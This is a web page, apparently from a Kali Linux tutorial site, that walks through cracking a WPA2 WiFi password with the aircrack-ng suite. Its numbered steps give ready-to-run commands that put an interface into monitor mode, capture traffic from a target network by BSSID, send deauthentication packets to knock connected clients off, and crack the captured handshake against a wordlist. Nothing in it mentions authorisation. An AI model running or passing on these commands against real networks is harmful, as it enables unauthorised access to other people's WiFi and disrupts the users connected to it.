top of page

Step 1: ifconfig(interface configuration) : To view or change the configuration of the network interfaces on your system.

Step 2: Stop the current processes which are using the WiFi interface.

airmon-ng check kill

Step 3: To start the wlan0 in monitor mode.

airmon-ng start wlan0

Step 4: To view all the Wifi networks around you.

airodump-ng wlan0mon

Step 5: To view the clients connected to the target network.

airodump-ng -c 1 --bssid 80:35:C1:13:C1:2C -w /root wlan0mon

Step 6: Open a new terminal window to disconnect the clients connected to the target network.

aireplay-ng -0 10 -a 80:35:C1:13:C1:2C wlan0mon

Step 7. To decrypt the password. Open the Files application.

Here,

hacking-01.cap is the file you need.
aircrack-ng -a2 -b 80:35:C1:13:C1:2C -w /root/passwords.txt /root/hacking-01.cap
aircrack-ng : 802.11 WEP and WPA-PSK keys cracking program

-a : -a2 for WPA2 & -a for WPA network
-b : The BSSID of the target network
-w : Location of the wordlist file
/root/hacking-01.cap : Location of the cap file

MORE INFO FOR COME OUR WEB SITE |
LINK AVAILABLE IN BIO #kalilinux #kalilinuxtools

© Copyright KALI LINUX TUTORIAL
  • Instagram
  • Instagram
  • Facebook
  • Twitter
  • Twitter

Subscribe to our newsletter • Don’t miss out!

Thanks for subscribing!

bottom of page